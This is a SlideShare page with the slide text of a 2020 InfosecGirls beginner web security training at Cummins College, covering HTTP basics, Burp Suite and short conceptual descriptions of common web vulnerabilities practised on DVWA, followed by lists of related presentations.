Infosec girls training-hackcummins-college-jan-2020(v0.1)

S
Shrutirupa Banerjiee
INFOSECGIRLS TRAINING IN COLLABORATION WITH HACKCUMMINS
$WHOIS INFOSECGIRLS • Community for women in Information Security. Website Twitter Facebook Linkedin YouTube Mailing List
WHY INFOSECGIRLS? • We aim is to bring in more women in security and help them to grow in the area.
TRAINERS • Ishaq Mohammed, Appsec @ Qualys • Shrutirupa Banerjiee, @WAF Research @ Qualys • Komal Armarkar, Spotlight Engineer @Crowdstrike
AGENDA: Basics of Web Application Architecture Client Server Communication HTTP/S HTTP Methods Status Codes The WHY factor Test Cases Vulnerabilities Demo
WEB APPLICATION
ARCHITECTU RE
HTTP/HTTPS • HyperText Transfer Protocol (Secure) • used by the World Wide Web • defines how messages are formatted and transmitted • what actions Web servers and browsers should take in response to various commands
METHODS • GET • POST • PUT • OPTIONS • AND MANY MORE…
STATUS CODES • 1xx - informational • 2xx - success • 3xx - redirection • 4xx - client error • 5xx - server error
HTTP HEADERS
Infosec girls training-hackcummins-college-jan-2020(v0.1)
Infosec girls training-hackcummins-college-jan-2020(v0.1)
COOKIE
HOW DO WE VIEW THE SOURCE CODE??
View-source Inspect element
VIEW-SOURCE
INSPECT ELEMENT
Infosec girls training-hackcummins-college-jan-2020(v0.1)
THE WHY FACTOR WHY ARE WE TALKING ABOUT IT???
Infosec girls training-hackcummins-college-jan-2020(v0.1)
VULNERABILIT IES TO BE COVERED TODAY File inclusion File upload Xss reflected Xss stored SQL Injection
DEMO
Infosec girls training-hackcummins-college-jan-2020(v0.1)
FILE INCLUSION • Local File Inclusion • Remote File Inclusion
FILE UPLOAD • Uploading a malicious file • Can lead to Remote Code Execution
XSS REFLECTED • malicious script bounces off of another website to the victim's browser • You can trick a user to click on a malicious link to steal user’s cookies
XSS STORED • malicious script is injected directly into a vulnerable web application • The script is stored in the web application
SQL INJECTION • Executing malicious SQL statements in the web application • To gain unauthorized access to the sensitive data in the database
COMMAND INJECTION • Attacker can execute commands directly • Can lead to remote code execution, hence, getting the shell of the server
LETS DEEP DIVE A BIT MORE!!!
WHAT IS PROXY??
BURPSUITE
INITIAL SETUP AND CONFIGURATIO N
SPIDER
SCANNER
REPEATER
INTRUDER
DECODER
LET’S EXPLOIT SOME VULNERABILITIES USING BURP!!!
FILE UPLOAD – MEDIUM CSRF – LOW
FILE UPLOAD • Let’s bypass the mitigations
CSRF • Cross Site Request Forgery • Aims at authenticated users to make them execute unwanted actions
Infosec girls training-hackcummins-college-jan-2020(v0.1)
REFERENCES: • Damn Vulnerable Web Application (DVWA) • HTTP • Learn web development
RESOURCES • So, you want to work in security? • Roadmap for Application Security • Getting Started in Offensive Security • BREAKING INTO INFOSEC: A BEGINNERS CURRICULUM • OWASP Foundation • OWASP Top 10 – 2017 • CodePath Web Security Guides • Awesome-Hacking • High-Level Approaches for Finding Vulnerabilities
TRAINER CONTACT • Shrutirupa Banerjiee - https://twitter.com/freak_crypt • Komal Armarkar - https://twitter.com/n0th1n3_00X • Ishaq Mohammed - https://twitter.com/security_prince
Infosec girls training-hackcummins-college-jan-2020(v0.1)
1 of 48

Infosec girls training-hackcummins-college-jan-2020(v0.1)

Download to read offline
Technology

The presentation describes the basics of web applications and learning different ways to detect and analyse security issues related to the same. DVWA has been used as vulnerable web application to practice different critical vulnerabilities and hence, analysing and exploiting them. The training was conducted on 18th-19th Jan at Cummins College. https://www.meetup.com/WoSEC-India-Women-of-Security/events/267828816/?_xtd=gatlbWFpbF9jbGlja9oAJGRhYjRiZTA0LTI5NTUtNDAzNi1iNTU5LTEzYmEyODY1Yzk1Yg

S
Shrutirupa Banerjiee

Recommended

Top 10 web application security risks akash mahajan by
Top 10 web application security risks akash mahajanTop 10 web application security risks akash mahajan
Top 10 web application security risks akash mahajanAkash Mahajan
1.4K views21 slides
MongoDB World 2019: MongoDB Atlas Security 101 for Developers by
MongoDB World 2019: MongoDB Atlas Security 101 for DevelopersMongoDB World 2019: MongoDB Atlas Security 101 for Developers
MongoDB World 2019: MongoDB Atlas Security 101 for DevelopersMongoDB
381 views48 slides
Web application security by
Web application securityWeb application security
Web application securityAkash Mahajan
707 views9 slides
Web application security: Threats & Countermeasures by
Web application security: Threats & CountermeasuresWeb application security: Threats & Countermeasures
Web application security: Threats & CountermeasuresAung Thu Rha Hein
7.4K views16 slides
Spa Secure Coding Guide by
Spa Secure Coding GuideSpa Secure Coding Guide
Spa Secure Coding GuideGeoffrey Vandiest
153 views32 slides
Web application security & Testing by
Web application security & TestingWeb application security & Testing
Web application security & TestingDeepu S Nath
10.1K views36 slides

More Related Content

What's hot

Web application security by
Web application securityWeb application security
Web application securityAkash Mahajan
658 views9 slides
Continuous Integration and Quality Development by
Continuous Integration and Quality DevelopmentContinuous Integration and Quality Development
Continuous Integration and Quality DevelopmentGareth Davies
1.5K views21 slides
Hacking Samsung's Tizen: The OS of Everything - Hack In the Box 2015 by
Hacking Samsung's Tizen: The OS of Everything - Hack In the Box 2015Hacking Samsung's Tizen: The OS of Everything - Hack In the Box 2015
Hacking Samsung's Tizen: The OS of Everything - Hack In the Box 2015Ajin Abraham
8K views53 slides
Spring Boot Authentication...and More! by
Spring Boot Authentication...and More! Spring Boot Authentication...and More!
Spring Boot Authentication...and More! Stormpath
2.4K views12 slides
Web security by
Web security Web security
Web security Kaushal Bhavsar
378 views15 slides
Security guidelines by
Security guidelinesSecurity guidelines
Security guidelineskarthz
52 views25 slides

What's hot(19)

Web application security by Akash Mahajan
Web application securityWeb application security
Web application security
Akash Mahajan658 views
Continuous Integration and Quality Development by Gareth Davies
Continuous Integration and Quality DevelopmentContinuous Integration and Quality Development
Continuous Integration and Quality Development
Gareth Davies1.5K views
Hacking Samsung's Tizen: The OS of Everything - Hack In the Box 2015 by Ajin Abraham
Hacking Samsung's Tizen: The OS of Everything - Hack In the Box 2015Hacking Samsung's Tizen: The OS of Everything - Hack In the Box 2015
Hacking Samsung's Tizen: The OS of Everything - Hack In the Box 2015
Ajin Abraham8K views
Spring Boot Authentication...and More! by Stormpath
Spring Boot Authentication...and More! Spring Boot Authentication...and More!
Spring Boot Authentication...and More!
Stormpath2.4K views
Web security by Kaushal Bhavsar
Web security Web security
Web security
Kaushal Bhavsar378 views
Security guidelines by karthz
Security guidelinesSecurity guidelines
Security guidelines
karthz52 views
Hacking Tizen : The OS of Everything - Nullcon Goa 2015 by Ajin Abraham
Hacking Tizen : The OS of Everything - Nullcon Goa 2015Hacking Tizen : The OS of Everything - Nullcon Goa 2015
Hacking Tizen : The OS of Everything - Nullcon Goa 2015
Ajin Abraham7K views
How to Use Stormpath in angular js by Stormpath
How to Use Stormpath in angular jsHow to Use Stormpath in angular js
How to Use Stormpath in angular js
Stormpath2.2K views
Zero Credential Development with Managed Identities for Azure resources by Joonas Westlin
Zero Credential Development with Managed Identities for Azure resourcesZero Credential Development with Managed Identities for Azure resources
Zero Credential Development with Managed Identities for Azure resources
Joonas Westlin1.5K views
WSO2Con EU 2016: Securing APIs: How, What, Why, When by WSO2
WSO2Con EU 2016: Securing APIs: How, What, Why, WhenWSO2Con EU 2016: Securing APIs: How, What, Why, When
WSO2Con EU 2016: Securing APIs: How, What, Why, When
WSO2689 views
OWASP Serbia - A3 broken authentication and session management by Nikola Milosevic
OWASP Serbia - A3 broken authentication and session managementOWASP Serbia - A3 broken authentication and session management
OWASP Serbia - A3 broken authentication and session management
Nikola Milosevic4.5K views
Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013 by Lostar
Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013 Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013
Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013
Lostar863 views
Spring Security by Sumit Gole
Spring SecuritySpring Security
Spring Security
Sumit Gole1.1K views
Domain Driven Security at Internetdagarna-2014 by Dan BerghJohnsson
Domain Driven Security at Internetdagarna-2014Domain Driven Security at Internetdagarna-2014
Domain Driven Security at Internetdagarna-2014
Dan BerghJohnsson1K views
Zero Credential Development with Managed Identities by Joonas Westlin
Zero Credential Development with Managed IdentitiesZero Credential Development with Managed Identities
Zero Credential Development with Managed Identities
Joonas Westlin372 views
Secure deployments keeping your application secrets private -duug fest by Henry Been
Secure deployments keeping your application secrets private -duug festSecure deployments keeping your application secrets private -duug fest
Secure deployments keeping your application secrets private -duug fest
Henry Been309 views
Spring Security by Boy Tech
Spring SecuritySpring Security
Spring Security
Boy Tech10.5K views
Securing the cloud by ZIONSECURITY
Securing the cloudSecuring the cloud
Securing the cloud
ZIONSECURITY511 views
Instant Security & Scalable User Management with Spring Boot by Stormpath
Instant Security & Scalable User Management with Spring BootInstant Security & Scalable User Management with Spring Boot
Instant Security & Scalable User Management with Spring Boot
Stormpath669 views

Similar to Infosec girls training-hackcummins-college-jan-2020(v0.1)

Force.com security by
Force.com securityForce.com security
Force.com securityVijay Naik
390 views29 slides
Lesson 6 web based attacks by
Lesson 6 web based attacksLesson 6 web based attacks
Lesson 6 web based attacksFrank Victory
1.1K views32 slides
The OWASP Zed Attack Proxy by
The OWASP Zed Attack ProxyThe OWASP Zed Attack Proxy
The OWASP Zed Attack ProxyAditya Gupta
39.1K views38 slides
Security testing presentation by
Security testing presentationSecurity testing presentation
Security testing presentationConfiz
8.2K views27 slides
CSS 17: NYC - Protecting your Web Applications by
CSS 17: NYC - Protecting your Web ApplicationsCSS 17: NYC - Protecting your Web Applications
CSS 17: NYC - Protecting your Web ApplicationsAlert Logic
255 views31 slides
How to Test for The OWASP Top Ten by
How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top TenSecurity Innovation
3.3K views36 slides

Similar to Infosec girls training-hackcummins-college-jan-2020(v0.1)(20)

Force.com security by Vijay Naik
Force.com securityForce.com security
Force.com security
Vijay Naik390 views
Lesson 6 web based attacks by Frank Victory
Lesson 6 web based attacksLesson 6 web based attacks
Lesson 6 web based attacks
Frank Victory1.1K views
The OWASP Zed Attack Proxy by Aditya Gupta
The OWASP Zed Attack ProxyThe OWASP Zed Attack Proxy
The OWASP Zed Attack Proxy
Aditya Gupta39.1K views
Security testing presentation by Confiz
Security testing presentationSecurity testing presentation
Security testing presentation
Confiz8.2K views
CSS 17: NYC - Protecting your Web Applications by Alert Logic
CSS 17: NYC - Protecting your Web ApplicationsCSS 17: NYC - Protecting your Web Applications
CSS 17: NYC - Protecting your Web Applications
Alert Logic 255 views
How to Test for The OWASP Top Ten by Security Innovation
How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten
Security Innovation3.3K views
Vulnerabilidades en sitios web (english) by Miguel de la Cruz
Vulnerabilidades en sitios web (english)Vulnerabilidades en sitios web (english)
Vulnerabilidades en sitios web (english)
Miguel de la Cruz322 views
CSS17: Houston - Protecting Web Apps by Alert Logic
CSS17: Houston - Protecting Web AppsCSS17: Houston - Protecting Web Apps
CSS17: Houston - Protecting Web Apps
Alert Logic 614 views
Css sf azure_8-9-17-protecting_web_apps_stephen coty_al by Alert Logic
Css sf azure_8-9-17-protecting_web_apps_stephen coty_alCss sf azure_8-9-17-protecting_web_apps_stephen coty_al
Css sf azure_8-9-17-protecting_web_apps_stephen coty_al
Alert Logic 99 views
Do you lose sleep at night? by Nathan Van Gheem
Do you lose sleep at night?Do you lose sleep at night?
Do you lose sleep at night?
Nathan Van Gheem1.4K views
Web application security part 01 by G Prachi
Web application security part 01Web application security part 01
Web application security part 01
G Prachi237 views
Injecting simplicity not SQL RSA Europe 2010 by Security Ninja
Injecting simplicity not SQL RSA Europe 2010Injecting simplicity not SQL RSA Europe 2010
Injecting simplicity not SQL RSA Europe 2010
Security Ninja648 views
API SECURITY by Tubagus Rizky Dharmawan
API SECURITYAPI SECURITY
API SECURITY
Tubagus Rizky Dharmawan307 views
Web Application Security with PHP by jikbal
Web Application Security with PHPWeb Application Security with PHP
Web Application Security with PHP
jikbal51.6K views
Web App Security Presentation by Ryan Holland - 05-31-2017 by TriNimbus
Web App Security Presentation by Ryan Holland - 05-31-2017Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017
TriNimbus2.6K views
Hacking mobile apps by kunwaratul hax0r
Hacking mobile appsHacking mobile apps
Hacking mobile apps
kunwaratul hax0r102 views
A DevOps Guide to Web Application Security by Imperva Incapsula
A DevOps Guide to Web Application SecurityA DevOps Guide to Web Application Security
A DevOps Guide to Web Application Security
Imperva Incapsula1.6K views
Browser Security 101 by Stormpath
Browser Security 101 Browser Security 101
Browser Security 101
Stormpath2.1K views
Jonathan Singer - Wheezing The Juice.pdf by Jonathan Singer
Jonathan Singer - Wheezing The Juice.pdfJonathan Singer - Wheezing The Juice.pdf
Jonathan Singer - Wheezing The Juice.pdf
Jonathan Singer36 views
Security testautomation by Linkesh Kanna Velu
Security testautomationSecurity testautomation
Security testautomation
Linkesh Kanna Velu2.6K views

Recently uploaded

Future of AR - Facebook Presentation by
Future of AR - Facebook PresentationFuture of AR - Facebook Presentation
Future of AR - Facebook PresentationRob McCarty
54 views27 slides
CloudStack and GitOps at Enterprise Scale - Alex Dometrius, Rene Glover - AT&T by
CloudStack and GitOps at Enterprise Scale - Alex Dometrius, Rene Glover - AT&TCloudStack and GitOps at Enterprise Scale - Alex Dometrius, Rene Glover - AT&T
CloudStack and GitOps at Enterprise Scale - Alex Dometrius, Rene Glover - AT&TShapeBlue
81 views34 slides
CloudStack Object Storage - An Introduction - Vladimir Petrov - ShapeBlue by
CloudStack Object Storage - An Introduction - Vladimir Petrov - ShapeBlueCloudStack Object Storage - An Introduction - Vladimir Petrov - ShapeBlue
CloudStack Object Storage - An Introduction - Vladimir Petrov - ShapeBlueShapeBlue
63 views15 slides
Setting Up Your First CloudStack Environment with Beginners Challenges - MD R... by
Setting Up Your First CloudStack Environment with Beginners Challenges - MD R...Setting Up Your First CloudStack Environment with Beginners Challenges - MD R...
Setting Up Your First CloudStack Environment with Beginners Challenges - MD R...ShapeBlue
105 views15 slides
DRaaS using Snapshot copy and destination selection (DRaaS) - Alexandre Matti... by
DRaaS using Snapshot copy and destination selection (DRaaS) - Alexandre Matti...DRaaS using Snapshot copy and destination selection (DRaaS) - Alexandre Matti...
DRaaS using Snapshot copy and destination selection (DRaaS) - Alexandre Matti...ShapeBlue
69 views29 slides
How to Re-use Old Hardware with CloudStack. Saving Money and the Environment ... by
How to Re-use Old Hardware with CloudStack. Saving Money and the Environment ...How to Re-use Old Hardware with CloudStack. Saving Money and the Environment ...
How to Re-use Old Hardware with CloudStack. Saving Money and the Environment ...ShapeBlue
97 views28 slides

Recently uploaded(20)

Future of AR - Facebook Presentation by Rob McCarty
Future of AR - Facebook PresentationFuture of AR - Facebook Presentation
Future of AR - Facebook Presentation
Rob McCarty54 views
CloudStack and GitOps at Enterprise Scale - Alex Dometrius, Rene Glover - AT&T by ShapeBlue
CloudStack and GitOps at Enterprise Scale - Alex Dometrius, Rene Glover - AT&TCloudStack and GitOps at Enterprise Scale - Alex Dometrius, Rene Glover - AT&T
CloudStack and GitOps at Enterprise Scale - Alex Dometrius, Rene Glover - AT&T
ShapeBlue81 views
CloudStack Object Storage - An Introduction - Vladimir Petrov - ShapeBlue by ShapeBlue
CloudStack Object Storage - An Introduction - Vladimir Petrov - ShapeBlueCloudStack Object Storage - An Introduction - Vladimir Petrov - ShapeBlue
CloudStack Object Storage - An Introduction - Vladimir Petrov - ShapeBlue
ShapeBlue63 views
Setting Up Your First CloudStack Environment with Beginners Challenges - MD R... by ShapeBlue
Setting Up Your First CloudStack Environment with Beginners Challenges - MD R...Setting Up Your First CloudStack Environment with Beginners Challenges - MD R...
Setting Up Your First CloudStack Environment with Beginners Challenges - MD R...
ShapeBlue105 views
DRaaS using Snapshot copy and destination selection (DRaaS) - Alexandre Matti... by ShapeBlue
DRaaS using Snapshot copy and destination selection (DRaaS) - Alexandre Matti...DRaaS using Snapshot copy and destination selection (DRaaS) - Alexandre Matti...
DRaaS using Snapshot copy and destination selection (DRaaS) - Alexandre Matti...
ShapeBlue69 views
How to Re-use Old Hardware with CloudStack. Saving Money and the Environment ... by ShapeBlue
How to Re-use Old Hardware with CloudStack. Saving Money and the Environment ...How to Re-use Old Hardware with CloudStack. Saving Money and the Environment ...
How to Re-use Old Hardware with CloudStack. Saving Money and the Environment ...
ShapeBlue97 views
Igniting Next Level Productivity with AI-Infused Data Integration Workflows by Safe Software
Igniting Next Level Productivity with AI-Infused Data Integration Workflows Igniting Next Level Productivity with AI-Infused Data Integration Workflows
Igniting Next Level Productivity with AI-Infused Data Integration Workflows
Safe Software373 views
Migrating VMware Infra to KVM Using CloudStack - Nicolas Vazquez - ShapeBlue by ShapeBlue
Migrating VMware Infra to KVM Using CloudStack - Nicolas Vazquez - ShapeBlueMigrating VMware Infra to KVM Using CloudStack - Nicolas Vazquez - ShapeBlue
Migrating VMware Infra to KVM Using CloudStack - Nicolas Vazquez - ShapeBlue
ShapeBlue147 views
Why and How CloudStack at weSystems - Stephan Bienek - weSystems by ShapeBlue
Why and How CloudStack at weSystems - Stephan Bienek - weSystemsWhy and How CloudStack at weSystems - Stephan Bienek - weSystems
Why and How CloudStack at weSystems - Stephan Bienek - weSystems
ShapeBlue172 views
Elevating Privacy and Security in CloudStack - Boris Stoyanov - ShapeBlue by ShapeBlue
Elevating Privacy and Security in CloudStack - Boris Stoyanov - ShapeBlueElevating Privacy and Security in CloudStack - Boris Stoyanov - ShapeBlue
Elevating Privacy and Security in CloudStack - Boris Stoyanov - ShapeBlue
ShapeBlue149 views
Extending KVM Host HA for Non-NFS Storage - Alex Ivanov - StorPool by ShapeBlue
Extending KVM Host HA for Non-NFS Storage - Alex Ivanov - StorPoolExtending KVM Host HA for Non-NFS Storage - Alex Ivanov - StorPool
Extending KVM Host HA for Non-NFS Storage - Alex Ivanov - StorPool
ShapeBlue56 views
Declarative Kubernetes Cluster Deployment with Cloudstack and Cluster API - O... by ShapeBlue
Declarative Kubernetes Cluster Deployment with Cloudstack and Cluster API - O...Declarative Kubernetes Cluster Deployment with Cloudstack and Cluster API - O...
Declarative Kubernetes Cluster Deployment with Cloudstack and Cluster API - O...
ShapeBlue59 views
Business Analyst Series 2023 - Week 4 Session 7 by DianaGray10
Business Analyst Series 2023 - Week 4 Session 7Business Analyst Series 2023 - Week 4 Session 7
Business Analyst Series 2023 - Week 4 Session 7
DianaGray10110 views
Transitioning from VMware vCloud to Apache CloudStack: A Path to Profitabilit... by ShapeBlue
Transitioning from VMware vCloud to Apache CloudStack: A Path to Profitabilit...Transitioning from VMware vCloud to Apache CloudStack: A Path to Profitabilit...
Transitioning from VMware vCloud to Apache CloudStack: A Path to Profitabilit...
ShapeBlue86 views
iSAQB Software Architecture Gathering 2023: How Process Orchestration Increas... by Bernd Ruecker
iSAQB Software Architecture Gathering 2023: How Process Orchestration Increas...iSAQB Software Architecture Gathering 2023: How Process Orchestration Increas...
iSAQB Software Architecture Gathering 2023: How Process Orchestration Increas...
Bernd Ruecker50 views
Digital Personal Data Protection (DPDP) Practical Approach For CISOs by Priyanka Aash
Digital Personal Data Protection (DPDP) Practical Approach For CISOsDigital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOs
Priyanka Aash103 views
Kyo - Functional Scala 2023.pdf by Flavio W. Brasil
Kyo - Functional Scala 2023.pdfKyo - Functional Scala 2023.pdf
Kyo - Functional Scala 2023.pdf
Flavio W. Brasil443 views
Network Source of Truth and Infrastructure as Code revisited by Network Automation Forum
Network Source of Truth and Infrastructure as Code revisitedNetwork Source of Truth and Infrastructure as Code revisited
Network Source of Truth and Infrastructure as Code revisited
Network Automation Forum49 views
Mitigating Common CloudStack Instance Deployment Failures - Jithin Raju - Sha... by ShapeBlue
Mitigating Common CloudStack Instance Deployment Failures - Jithin Raju - Sha...Mitigating Common CloudStack Instance Deployment Failures - Jithin Raju - Sha...
Mitigating Common CloudStack Instance Deployment Failures - Jithin Raju - Sha...
ShapeBlue113 views
Microsoft Power Platform.pptx by Uni Systems S.M.S.A.
Microsoft Power Platform.pptxMicrosoft Power Platform.pptx
Microsoft Power Platform.pptx
Uni Systems S.M.S.A.74 views

Infosec girls training-hackcummins-college-jan-2020(v0.1)